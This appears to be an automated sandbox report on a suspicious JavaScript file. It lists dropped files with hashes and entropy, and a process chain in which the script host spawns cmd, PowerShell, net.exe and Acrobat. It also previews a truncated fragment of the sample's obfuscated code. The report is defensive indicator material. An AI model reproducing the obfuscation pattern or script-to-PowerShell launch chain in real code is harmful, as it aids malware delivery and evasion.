Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.276785740278571 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXxTJGUBQWsGiIPEeOF0YsxoAvJfYdPeUkwRe9:YvXKXxxBDsdTeOvGg8Ukee9 |
MD5: | 1E8D0668E65C05F22F2B49870BD7288D |
SHA1: | 5BC6A12C4E2E2D149AFB282B21D788F59B50FBF0 |
SHA-256: | 99AF3998037B8828F8C8D1CFA20CC32AB383F8A3D364EF076B02AE09D26EFF5F |
SHA-512: | DC15916C6B78B8DF9C8426F83E2FFE0B167F02963728F65F9EA3650CD4912824A25391657201047599B0FD266C1A9CDFAA9F36D123F9718539A62D7938D7A03F |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.2624274113457865 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXxTJGUBQWsGiIPEeOF0YsxoAvJf+dPeUkwRe9:YvXKXxxBDsdTeOvG28Ukee9 |
MD5: | 07AB50E539FCBA6BD3F5B6F1062F8C61 |
SHA1: | C1C5481FE2F29778912C4F9AD4A911F40BC53561 |
SHA-256: | A48B21AB88A27264E9F49231F771A2B767C6FDE2F254597C650715A6A3F4FACB |
SHA-512: | DAA9ABEE90AE162D9747A6B53CCF6133F2399AC70155EB0D2CAC02C878A91531A8FE60B6A4021D83D01D963C47AF2FF8B272703B6339B8A6F27CEF5A3A6BEEA3 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.260492386129215 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXxTJGUBQWsGiIPEeOF0YsxoAvJfbPtdPeUkwRe9:YvXKXxxBDsdTeOvGDV8Ukee9 |
MD5: | E8C78E1A3CBE551CF89C67CA0018312E |
SHA1: | 2BA9C99F9417C44EC0028D59116CD1DD523A7BC0 |
SHA-256: | B3B7CA9C81C24302E2CB74AF6CBE3DEB2F1A86ECDB71F43C67366613F247658E |
SHA-512: | 68770FC849F48E3F551D66B6789E7D12A09A737E49C70B347FB8BE239822161F5F3CE589A668218F87C8CA5B3ED5C5D68943B116CAAE08C1CAEF92FA2BED4F35 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.265913932260815 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXxTJGUBQWsGiIPEeOF0YsxoAvJf21rPeUkwRe9:YvXKXxxBDsdTeOvG+16Ukee9 |
MD5: | D894B0D59FEEE02EF180BCBF85A465F0 |
SHA1: | 5242219307640EB9E51C37C9C2CAB3A72EA174C7 |
SHA-256: | 4AA8162D41C6704EB46E519DE98DFFF6018BD86DFD02300CAB3DAC16FE28424C |
SHA-512: | 9013D7CFB701CCEA8CAE803234DDD0186E208F235C3B977CA02DDF0338E0A04D88E8921A9C74A936D3AD9B005634BB883F093B87563DFA5A56DF3CC0952EEDF3 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.6589917543508195 |
Encrypted: | false |
SSDEEP: | 24:Yv6XlmeOwamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BS9:YvNejBgkDMUJUAh8cvM9 |
MD5: | 00A7F4D95D0F385BAC5966E1C35FFC72 |
SHA1: | 69EDD94B56B4CC9D2B47E06C08F0FA8570820306 |
SHA-256: | 23B15ECBB1762DA49A97D2276085A7472110A9D6307B2F3CDC555D8CA19AD76C |
SHA-512: | A5D678D2635F1024E75AF3D78F6578F167C4A19821A41D7598C9E965C74CCBC5F26B2DA3E620F31716D566691AD6B67518D9FC2F099516C80FA1EF8F9F55D1F5 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.240085230266338 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXxTJGUBQWsGiIPEeOF0YsxoAvJfshHHrPeUkwRe9:YvXKXxxBDsdTeOvGUUUkee9 |
MD5: | 5785A0F6CF547419419305518CC52013 |
SHA1: | 0C9FA23434E785AB219BAF6614D2727CDCF06BC2 |
SHA-256: | F0EC22E432BC559A5B7E14E8D74E44B730CD5FBBFE1098E9F90309CA8EF613A5 |
SHA-512: | 4ED9850DCFDAA151E0C4E0F7CBC06DD9ED19D500D57236F1ABFCE1FB45D6B9FE9E0BDDFCA15BC7F14FE1B4EFE5997E0289FB59A16C851557193509D92196E435 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.263265162969209 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXxTJGUBQWsGiIPEeOF0YsxoAvJTqgFCrPeUkwRe9:YvXKXxxBDsdTeOvGTq16Ukee9 |
MD5: | 63A1AA007BCC9CC3F888FF3F398F9306 |
SHA1: | 770AEE6EB51AD3411EE2116EFF52E58D8E04D5D7 |
SHA-256: | DCB212B8D4A11342E70F3872DEC1A6D50162336243F98EA6EC1288D963585933 |
SHA-512: | 073C33850D73CE16DAEF8646B2FF24C7673D0D47822098EB451D0C4CB772C8CB37C5A7E8CB98DD8650721C2D4296CB4316353771552892B23F7048594CB61449 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.139582746833177 |
Encrypted: | false |
SSDEEP: | 48:Y+dO0uxAyj7/hIAllVbgIcE0itpCT9b9g:FdO0QH/uAf5hFtpCRpg |
MD5: | 5830D217BCEF152CE3390CF7D4C3C73E |
SHA1: | 5ED493125A657120495B6B0F5E4C6FC33D75E836 |
SHA-256: | C3DBEBC05EB71C79B8E0C95B03F5F6D6D46DE133BF5E2516ACC3D7DAB98435A8 |
SHA-512: | 2DDCDE75DA07953629072C2A9211D8CF230034F02723B0B4EC74AADD4EF686B377A441D83F27776863A78165A9B133705C471037A4B4EF4F6913B637705FF2AB |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.453327001317817 |
Encrypted: | false |
SSDEEP: | 48:TGufl2GL7msCvrBd6dHtbGIbPe0K3+fDy2dsM6lqc:lNVmsw3SHtbDbPe0K3+fDZdXvc |
MD5: | 4A5C8340BA9064E842FB2B2C20CDCBB0 |
SHA1: | 3E663876165F4DB80059A2420C26B9DDCEAD51DC |
SHA-256: | EC768ECB18DAB38AAF32CF2918870115B47776C75B662320ABB551D3B922C3B9 |
SHA-512: | 7CC35233672758C4DDB25BEA5CB37F0CC2D6E4934145E7C2EB7FB1236CAE381C42FA5AFD2004B33A5AC2D7ED00185C50F77B00721D6A11DE4F39C9091FCDBD06 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.9575473281874716 |
Encrypted: | false |
SSDEEP: | 48:7MRrvrBd6dHtbGIbPe0K3+fDy2dsMjtqFl2GL7msT:7U3SHtbDbPe0K3+fDZdXhKVmsT |
MD5: | 7AC5CE35139D0E340B8763EDDC24C21E |
SHA1: | F79F334F2BBF1E47E3BE18D1BC27E49CA11D5A95 |
SHA-256: | 7FB62D0259C41D82CB924D631261451638B65C46AD51D48800881F79F80BE2A1 |
SHA-512: | E9863D15926AC25B8455D25BA39565ABB10C02F0E8FD87A4BDF247B395DD355D8069CAE87254B3556903882B2FA59E7FB42D6E53436023C365362DE0EBD4D0F5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEgIeejVHSdZOhwP/E0yxGEbkQ+kPMYyu:6a6TZ44ADE7MhM/E0yxLbh9PMK |
MD5: | 90DE5CCD79990E409B802931320E1C85 |
SHA1: | 7CB7C6FB1A7451183A41B3A8C53100863DF80E28 |
SHA-256: | FC540D57B8F53E9187639D4D4F33BC722DD0FBF1FBB45FC66094FE9E358BC894 |
SHA-512: | 53E1D03E36058CF48A20A6325AEA9CFAC05287F8272F0DC6442457525EB2F390E0122FF56CAD53ECFE3DEFC39B3B8CFFE9B5F9B7023AD6923FF0AC288075E3CD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:NlllulnmWllZ:NllUmWl |
MD5: | 3EBBEC2F920D055DAC842B4FF84448FA |
SHA1: | 52D2AD86C481FAED6187FC7E6655C5BD646CA663 |
SHA-256: | 32441EEF46369E90F192889F3CC91721ECF615B0395CEC99996AB8CF06C59D09 |
SHA-512: | 163F2BECB9695851B36E3F502FA812BFBF6B88E4DCEA330A03995282E2C848A7DE6B9FDBA740E3DF536AB65390FBE3CC5F41F91505603945C0C79676B48EE5C3 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.493870954423123 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8EebClsx9:Qw946cPbiOxDlbYnuRK+bF |
MD5: | B2C5AC14B9001852C4CC7E68E9E13F2A |
SHA1: | 25679D8BA04B80AE7858A1E3DED14B4D5611EDBA |
SHA-256: | AA3BD8A0686CC64A2291D8F43B6E2592C17266B3ACB9A79D151EC5112D6665C6 |
SHA-512: | 83F5F4F11D0AAC4BCFA23D79FEC37471B5E02EB8345CAE67215957124172923322E1A443CD49C49F67327DF7834F4F43C7D90234C486D75AFB916F1C27DA5F97 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-10 21-23-20-870.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.386483451061953 |
Encrypted: | false |
SSDEEP: | 384:A2+jkjVj8jujXj+jPjghjKj0jLjmF/FRFO7t75NsXNsbNsgNssNsNNsaNsliNsTY:AXg5IqTS7Mh+oXChrYhFiQHXiz1W60ID |
MD5: | F49CA270724D610D1589E217EA78D6D1 |
SHA1: | 22D43D4BB9BDC1D1DEA734399D2D71E264AA3DD3 |
SHA-256: | D2FFBB2EF8FCE09991C2EFAA91B6784497E8C55845807468A3385CF6029A2F8D |
SHA-512: | 181B42465DE41E298329CBEB80181CBAB77CFD1701DBA31E61B2180B483BC35E2EFAFFA14C98F1ED0EDDE67F997EE4219C5318CE846BB0116A908FB2EAB61D29 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15114 |
Entropy (8bit): | 5.316841241774101 |
Encrypted: | false |
SSDEEP: | 384:8m4nAetNA1gWNIuTGEH261ERA010T5NLtilJ3LnY58RMdlydalGlU5RHbDJfMhpF:ed9 |
MD5: | A95C905EF5CBA49FAAE57E24E87674CC |
SHA1: | 8AE03988F546B618D6D457E57FA9F05A1D2FFA78 |
SHA-256: | D463E24643ACD32B6FB0E04BAC65C09A65B6E1CD7E378C84B6BA01FF4ED78889 |
SHA-512: | 5891E73381A6182C8F90F8F3791B76CD7B00D3795320D764DAFDAC39E3EDAE9A70A8E15A76ACE549735443985B1B4D017EF3D946FB9564405C051F7876D3F408 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 35721 |
Entropy (8bit): | 5.409307248456887 |
Encrypted: | false |
SSDEEP: | 768:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRldy0+AyxkHBDgRh9gRJn:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gR7 |
MD5: | 47C816ED032FA209E547DCF54CC3AE9C |
SHA1: | 4C74ABCA62E1BD9075F79E17BC1A15EA24FE9ED6 |
SHA-256: | 3ACC07365934CEEA9F1F986E46F0CC353E95D8EB85A2DEB3BB5BFCBB31BE3BF9 |
SHA-512: | 784B12107BF3E8D33EADDD7FD83F1EA829EE3A41D26F9C1058EDC3E25B9D688A6BB2E98142E950FE6AEE663AD36CEEC3D3C439A7E1183F1C9DC8E00A56614B08 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/pwYIGNPQ9WL07oXGZfPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:xwZG29WLxXGZn3mlind9i4ufFXpAXkru |
MD5: | 17A4D09E4373155D739D65D37FDD108E |
SHA1: | 88ABEDA0447CCB031DD1D459657336A3FC50E486 |
SHA-256: | 36FC00DA4B14D66BF783B992AC62C7590237C315B55D28A07A1B2E8678F918E3 |
SHA-512: | B95D3AB00F85EE3C41F813755485CF6B5C7A57F3DE9ACEF2DD2B0BDB3644580D36B43E5F44F5D9120FAD2AE128E7D69EFF2A9C58690B7162C20C497A24C88498 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/YkwYIGNPQbdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07WWL07oXGZd:DwZG2b3mlind9i4ufFXpAXkrfUs0qWLk |
MD5: | 38ED8E7B44D526DDA0F3E7608AF1AFA1 |
SHA1: | 45E30A6789382E29AC870CCF92B514FB95742C45 |
SHA-256: | 7B277E2332AE55A014D8C37CCC879D165E33315437F6197BEB153CD75E4EFBBF |
SHA-512: | 7169B1E4B2895A91FA0FBE4297CB70BE56D733084653334BB4E8421382F8F761DAD11B5D87277E0286A7C16CB53A2C79F96BB45F433D776E82A7CF45EA25121C |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.897419880656457 |
TrID: | |
File name: | 2920450291176811805.js |
File size: | 19'644 bytes |
MD5: | 71aff5a502c5980be0b763179f5f5bef |
SHA1: | 71d33cded04b4064c0b77c873313b2fbe35abe91 |
SHA256: | b36bd1000d2840ded617db9f1a77509d62bdf14e40c9b2460d8393666d1ab600 |
SHA512: | bc61784e864f1bd82e4d6a7eb9eadb1959483b3e77e2c5189c2fa09de22701280cde5bc7a65640278387fe07823c3698252ad5820747f8931daa9691f5e054b9 |
SSDEEP: | 192:hWXdZlxJS2I/2tzhzy4jFjMj2qhHOfMH1mpr7aT4bbVkEW/SY7qAzD/i2fubTQwl:Uy7T4GE/AzmrbTQwmUeuAUHXE6r |
TLSH: | C1927320288DC3499DDC19F9225B4CD7B0F900AF867984937C4766BC8A72A7AF5DE436 |
File Content Preview: | function ksexwclmc(){zmucllzy=[1031,3079,5127,4103,2055,3072];var zsoaz=this[fkfypc+twmtllwm+xqjxluo+orsywqoqs+wbzgdukp+szwbyodp+fcltjwf+kxwxixzl](this[nxnnw+hinshjjh+rolfii+xqjxluo+ufxhzyv+fkfypc+kxwxixzl][eieyqc+xqjxluo+wbzgdukp+twmtllwm+kxwxixzl+wbzgdu |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 21:23:08 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff783c00000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 21:23:08 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6d0bf0000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 21:23:08 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff75da10000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 21:23:09 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff741d30000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 21:23:17 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff702560000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 6 |
Start time: | 21:23:17 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6d0bf0000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 21:23:17 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff713890000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 21:23:18 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6c3ff0000 |
File size: | 3'581'912 bytes |
